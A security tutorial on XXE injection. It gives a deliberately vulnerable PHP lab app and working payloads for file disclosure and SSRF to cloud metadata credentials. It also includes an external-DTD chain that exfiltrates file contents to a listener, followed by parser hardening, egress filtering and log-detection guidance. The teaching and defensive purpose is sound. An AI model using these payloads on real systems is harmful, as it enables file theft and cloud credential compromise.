Disclaimer: This article is for education and authorized testing only. Run these techniques exclusively against systems you own or have explicit written permission to test. Unauthorized testing is illegal in most jurisdictions.
Introduction
XML External Entity (XXE) injection remains one of the most impactful server-side flaws in the OWASP catalogue. When an application parses attacker-controlled XML with a misconfigured parser, an attacker can read local files, perform SSRF, reach internal services, and in well-configured environments still exfiltrate data through out-of-band (OOB) channels.
In this post you'll learn how XXE actually works at the parser level, how to confirm and exploit a classic file-disclosure XXE, and how to escalate to blind XXE with an external DTD and OOB exfiltration. We'll close with a Blue Team section that carries equal weight: how to detect and shut these attacks down.
How It Works
XML supports a feature called entities — placeholders that the parser expands at parse time. They are declared in a Document Type Definition (DTD), introduced with the <!DOCTYPE ...> declaration.
A normal internal entity simply substitutes a string:
<!DOCTYPE foo [ <!ENTITY name "yunolay"> ]>
<data>&name;</data>XMLAn external entity tells the parser to fetch content from a URI — and this is where the danger lies. The SYSTEM keyword accepts file://, http://, ftp://, and (depending on the parser/PHP wrappers) other schemes:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>XMLIf the application reflects the parsed value back to the user, the contents of /etc/passwd appear in the response. The root cause is parsers that resolve external entities by default — historically Java's DocumentBuilderFactory, PHP's libxml (pre-2.9.0 default), .NET's XmlDocument, and many others.
When the response does not echo the entity, the attack becomes blind. We then chain a parameter entity with an external DTD to force the parser to make an outbound request carrying the stolen data — the OOB technique.
Prerequisites / Lab Setup
You need a vulnerable endpoint that accepts XML. The simplest local target is a small PHP service with the legacy resolver enabled:
<?php
// index.php — DELIBERATELY VULNERABLE, lab only
libxml_disable_entity_loader(false); // re-enables external entities
$xml = file_get_contents('php://input');
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT | LIBXML_DTDLOAD);
echo "Hello, " . $doc->name;PHPRun it and an attacker-controlled "collaborator" listener:
# Terminal 1 — vulnerable app
php -S 127.0.0.1:8080
# Terminal 2 — OOB / exfil listener (also serves the malicious DTD)
python3 -m http.server 8000BashFor real engagements, Burp Suite Collaborator provides a unique DNS/HTTP catcher; the local http.server above is a stand-in.
Attack Walkthrough
1. Confirm XML parsing
Send a benign internal entity and check it expands:
curl -s http://127.0.0.1:8080/ \
--data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY t "PROOF"> ]>
<root><name>&t;</name></root>'
# Response: "Hello, PROOF" -> entities are processedBash2. Classic file disclosure (in-band)
curl -s http://127.0.0.1:8080/ \
--data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root><name>&xxe;</name></root>'BashThe response now contains /etc/passwd. On PHP targets, the php://filter wrapper base64-encodes files that would otherwise break the XML parser (e.g. source code containing <):
curl -s http://127.0.0.1:8080/ \
--data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM
"php://filter/convert.base64-encode/resource=/var/www/html/index.php"> ]>
<root><name>&xxe;</name></root>'BashPipe the result to base64 -d to recover the source.
3. XXE to SSRF
Swap the file:// URI for an internal HTTP target to reach metadata services or internal apps:
<!DOCTYPE r [ <!ENTITY xxe SYSTEM
"http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]>
<root><name>&xxe;</name></root>XMLThis is a common pivot into cloud credential theft — see also SSRF to cloud metadata.
4. Blind XXE with OOB exfiltration
When nothing is reflected, host an external DTD on your listener. Save this as evil.dtd served by the http.server:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://127.0.0.1:8000/?d=%file;'>">
%eval;
%exfil;XMLThen submit a payload that pulls and triggers the external DTD via parameter entities (%):
curl -s http://127.0.0.1:8080/ \
--data-binary '<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % remote SYSTEM "http://127.0.0.1:8000/evil.dtd">
%remote;
]>
<root><name>test</name></root>'BashThe parser fetches evil.dtd, reads the target file into %file, builds an entity whose URI embeds that data, and resolves it — sending a request to your listener:
127.0.0.1 - - "GET /?d=cm9vdDp4OjA6MDpyb290Oi9yb290... HTTP/1.0" 200PlaintextBase64-decode the d parameter to recover the file. This works even when the parser blocks general external entities inside the internal subset, because parameter entities in an external DTD are processed separately. For files containing newlines, an FTP-based exfil DTD (using a tool like xxeftp / XXEinjector) avoids HTTP query-string truncation.
Attack Flow Diagram

The diagram shows the blind OOB chain: the app fetches the attacker's DTD, reads a local file, then leaks it back over an outbound request the attacker captures.
Detection & Defense (Blue Team)
XXE is fully preventable at the parser layer. Defense should be applied with the same rigor as any offensive testing.
1. Disable DTDs and external entities (primary control). This is the definitive fix.
// Java — DocumentBuilderFactory hardening
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);Java// .NET — safe XmlReader settings
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null
};C#// PHP >= 8.0: external entities are off by default.
// libxml_disable_entity_loader() is deprecated/removed; never re-enable.
// Avoid LIBXML_NOENT and LIBXML_DTDLOAD on untrusted input.
$doc = simplexml_load_string($xml); // no dangerous flagsPHP2. Egress filtering. Block the application's outbound DNS/HTTP to arbitrary destinations. OOB and SSRF-based XXE both depend on the server making requests it never normally should. Deny-by-default egress neutralizes blind exfiltration.
3. WAF and input validation. Reject requests whose body contains <!DOCTYPE or <!ENTITY when your API does not legitimately need a DTD. This is a defense-in-depth signal, not a primary control.
4. Detection rules. Hunt for these in WAF/proxy logs:
# Surface likely XXE attempts in access/body logs
grep -aiE '<!DOCTYPE|<!ENTITY|SYSTEM "file:|php://filter|169\.254\.169\.254' access.logBashAlert on application servers initiating outbound connections to unexpected hosts, requests to 169.254.169.254, and file:// access patterns in parser error logs. Map this to MITRE ATT&CK T1190 (Exploit Public-Facing Application) and the SSRF pivot to T1552.005 (Cloud Instance Metadata API).
5. Keep libraries patched. Track CVEs in your XML stack — e.g. CVE-2018-1000840 (Apache Spark XXE) and the recurring XXE issues in office-document and SOAP parsers. Many frameworks now ship secure-by-default, but legacy services lag.
For broader server-side exploitation context, see Server-Side Template Injection.
Conclusion
XXE turns a routine XML endpoint into a file-read, SSRF, and data-exfiltration primitive. The classic in-band variant is easy to confirm and exploit; the blind OOB variant — using parameter entities and an external DTD — defeats applications that simply stop reflecting output. The good news for defenders is that a single, well-understood configuration (disable DTDs and external entities) eliminates the entire class. Combine that with strict egress controls and log-based detection, and XXE moves from "critical finding" to "non-issue."
References
- OWASP — XML External Entity (XXE) Prevention Cheat Sheet
- PortSwigger Web Security Academy — XXE injection
- HackTricks — XXE – XEE – XML External Entity
- MITRE ATT&CK — T1190 Exploit Public-Facing Application, T1552.005
- MITRE CVE — CVE-2018-1000840



Comments